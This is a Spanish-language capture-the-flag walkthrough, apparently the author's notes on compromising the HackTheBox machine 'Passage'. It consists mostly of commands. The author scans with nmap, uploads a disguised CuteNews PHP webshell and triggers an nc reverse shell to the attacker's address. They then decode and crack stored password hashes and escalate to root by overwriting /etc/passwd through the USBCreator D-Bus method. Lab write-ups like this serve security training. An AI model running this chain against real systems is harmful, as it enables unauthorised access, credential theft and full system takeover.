nmap -A -p- -oA output 10.129.150.170 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA passage 10.129.150.170

nmap -sU -O -p- -oA passage-udp 10.129.150.170

nikto -h 10.129.150.170:80

Pasted image 20220202064710.png

Pasted image 20220202064820.png

whatweb http://10.129.150.170

Pasted image 20220202064938.png

nmap --script http-enum -p80 10.129.150.170 -oN webScan -Pn

Pasted image 20220202065413.png

http://10.129.150.170

Pasted image 20220202065311.png

Vemos CuteNews

Pasted image 20220202065900.png

http://10.129.150.170/CuteNews

Pasted image 20220202065936.png

searchsploit CuteNews 2.1

Pasted image 20220202070028.png

http://10.129.150.170/CuteNews/?register

Pasted image 20220202070147.png

searchsploit -m 48800

Pasted image 20220202070313.png

cat cmd.php

ghex cmd.php

Pasted image 20220202070902.png

Le agregamos GIF8; al principio del archivo

file cmd.php

Pasted image 20220202071813.png

http://10.129.150.170/CuteNews/index.php

Editamos nuestro perfil

Le damos click a "Browse" y subimos el archivo cmd.php

![[Pasted image 20220202071103.png]]

echo "10.129.150.170 passage.htb" | sudo tee -a /etc/hosts

http://10.129.150.170/CuteNews/uploads/avatar_cu3rv0x_cmd.php?cmd=nc -e /bin/bash 10.10.14.45 443

Pasted image 20220202072023.png

nc -lvnp 443

Pasted image 20220202072152.png

shred -zun 10 -v avatar_cu3rv0x_cmd.php

Pasted image 20220202072359.png

Despues iniciamos sesion

Pasted image 20220202073452.png

https://github.com/CuteNews/cutenews-2.0

Vemos como esta estructurado CuteNews

cd /var/www/html/CuteNews/cdata/users

Pasted image 20220202073855.png

Iniciamos un shell de python

hashlib.md5("cu3rv0x").hexadigest()

Vemos que los primeros dos digitos son 22.

Entonces hacemos un cat a 22.php que seria la informacion para cu3rv0x ya que CuteNews no usa bd.

Pasted image 20220202074424.png

cat * | grep -v "denied" | base64-d; echo

Pasted image 20220202082320.png

Creamos un archivo credentials.txt y ponemos las credenciales.

vim credentials.txt

cat credentials.txt | awk '{print $2}' FS=":"

cat credentials.txt | awk '{print $2}' FS=":" |xclip -sel xclip

Pasted image 20220202082808.png

Vamos a crackstation y introducimos las credenciales

Pasted image 20220202082823.png

credenciales -> paul:atlanta1

su paul

Pasted image 20220202083031.png

cd ~/.ssh

cat authorized_keys

grep "sh$" /etc/passwd

Pasted image 20220202083242.png

lsattr

Pasted image 20220202083509.png

ssh nadav@localhost

Pasted image 20220202083558.png

whoami

id

ls -al

Pasted image 20220202084602.png

cat .viminfo

Pasted image 20220202084659.png

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/file.txt /file.txt true

Pasted image 20220202085128.png

cp /etc/passwd .

openssl passwd

Creamos una contrase~a. Yo use "test"

Pasted image 20220202085246.png

En passwd cambiamos la x por 9AyQs.WYSYTuE

Y guardamos el archivo

Pasted image 20220202085341.png

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true

Pasted image 20220202090415.png

su root

Ponemos la contrasena que habiamos creado con el openssl

Pasted image 20220202090536.png

boxes

copyright©2022 Cu3rv0x all rights reserved